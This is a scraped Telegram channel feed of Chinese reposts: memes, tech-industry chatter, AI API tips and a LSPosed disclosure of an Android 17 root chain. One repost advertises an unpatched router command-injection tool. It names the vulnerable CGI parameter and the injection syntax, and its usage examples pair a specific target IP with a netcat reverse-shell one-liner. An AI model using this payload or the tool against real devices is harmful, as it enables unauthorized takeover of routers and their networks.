es
Feedback
二周目

<NullPointerException> 二周目

Ir al canal en Telegram

得不到的永远在骚动,被偏爱的都有恃无恐。 这里是 Sh1zuku /ɕizɨkɯ̟/。

Mostrar más
900
Suscriptores
+124 horas
+27 días
+1130 días
Archivo de publicaciones
无痛通过()
无痛通过()

Repost from 平壤卫视
……

Repost from 平壤卫视
群贤毕至
+9
群贤毕至

Repost from LSPosed
我们在 Android 17.0 中发现了一个特权进程任意代码执行漏洞。该漏洞已在 Android 17 QPR1 中修复,但 AOSP 安全公告中并未提及。结合 dirty frag 漏洞(CVE-2026-43284),我们在 Android 17.0 上成功实现了完整的 root 权限提升。 这是一个典型的 1day 漏洞。尽管补丁已发布,但用户无法获得漏洞修复,因此仍面临被攻击的风险:任何人都可以通过对比分析发现该漏洞的细节。而 dirty frag 漏洞虽已于三个月前披露,但至今仍可被利用。这是因为谷歌推迟了漏洞补丁的发布频率,将安全公告从每月一次改为每季度一次。在 AI 时代,这种做法不可理喻。由于 Pixel 系统镜像中泄露的漏洞细节,Android 生态中的大量设备都容易受到攻击,未参与 Beta 测试计划的 Pixel 设备也无法幸免。 因此,我们利用两个“已经”修复过的漏洞,演示了对安装有最新安全补丁的 CP2A.260705.006 稳定版系统 Google Pixel 10 设备获取 root 权限的操作,以此作为警示,敦促 Google 改变其做法并及时发布漏洞补丁。

今夕是何年
今夕是何年

外面在下猫猫狗狗

BA夏活
BA夏活

Repost from N/a
在接下来的一整年,我们不谈发展,不搞创新,每天张开眼,先看销量是否下降。 一周换好几个法子,推 Office 的文章。 每月的销售目标,压的我们喘不过气来,无心发展任何其他业务。 据我所知,当年一共有 X 家签了这个协议,大家为了各自的销售目标,疯狂压价。 先是 —— 你赚 30 元?好,那我降价只赚 15 元。 然后 —— 只要不亏本就好。 最后 —— 离季度销售目标还差点,亏本再卖 200 套就能完成了。 然后每个月初,账上看上去钱挺多,瞬间全用来进货 Office,再要翻倍倒贴进去。 ... 被反复抽打了一整年后,终于结束了。 ------------ 至于「数码荔枝」后来是怎么挺过来,其实很简单,因为我家里人掏出一百多万填进去了。 再往后的多年,慢慢还。
https://fixupx.com/DIGITALYCHEE/status/2085395617942327364

Repost from N/a
ZCode App x GLM Coding Plan 上线 “闲时任务” 功能 在不消耗订阅用户套餐额度的前提下,允许在 “算力富裕时段” 免费为用户完成委派的任务 评价:抛开这家公司不谈,这个模式还是挺有意思的,真的是最希望友商效仿的一集 *在此
ZCode App x GLM Coding Plan 上线 “闲时任务” 功能 在不消耗订阅用户套餐额度的前提下,允许在 “算力富裕时段” 免费为用户完成委派的任务 评价:抛开这家公司不谈,这个模式还是挺有意思的,真的是最希望友商效仿的一集 *在此之前 GLM 也一直推出各类优惠政策以尝试对算力削峰填谷: https://t.me/hatschannel/4310 (注意:并非定时任务,只能指定在 「特定的日期」内完成)

Repost from 我喜欢你
省流:没活硬整
+8
省流:没活硬整

我并不赞同抱着这样的想法去做科研,但是作为一个中国学生,也许这是对的
我并不赞同抱着这样的想法去做科研,但是作为一个中国学生,也许这是对的

Repost from N/a
TIL: (每日火星) DeepSeek API 早就提供了免费的 web search 接口: Responses API: https://api-docs.deepseek.com/zh-cn/guides/responses_api/#toolsweb_search / web_search_2025_08_26 : 支持,服务端执行。 A\ API: https://api-docs.deepseek.com/zh-cn/guides/anthropic_api#message-fieldsweb_search_tool_result: Supported 使用的供应商应该是 https://open.bochaai.com/, 最终的数据上游依旧是万能的 Bing 相当于免费白嫖 ¥36/千次 的搜索 API, 梁圣的恩情还不完 ✋😭🤚 btw: 冷门 (?) 小知识, Kimi For Coding & Kimi Code 也有内置免费的 web search 接口哦 🤔 或许这也能作为判断是否掺水的小妙招?大规模搜索 API 维护起来还是不便宜的

Repost from nyarvex
(0-day)飞鱼星路由器 weixin_auth.cgi 命令注入 - 逐字符写入工具
用法: python3 fyx_rce.py <目标URL> [要写入的命令] 示例: python3 fyx_rce.py http://222.88.213.2:8081 "mkfifo /tmp/f;cat /tmp/f|sh|nc 1.2.3.4 6666>/tmp/f" python3 fyx_rce.py http://222.88.213.2:8081 # 使用默认反弹shell命令
利用飞鱼星路由器 weixin_auth.cgi 接口中一个未经授权的远程命令注入漏洞(RCE),漏洞位于 /weixin_auth.cgi 的 extend 参数。CGI脚本在处理该参数时,未对用户输入进行过滤,直接将参数值拼接到系统shell命令中执行。构造 extend=volanswechatconnwifi';<注入命令>;',利用分号(;)闭合前面的正常语句,即可插入任意系统命令。

一脚油门直接飞出去了()

- 你这文件上传修了吗 - 如修
- 你这文件上传修了吗 - 如修

喜提edumail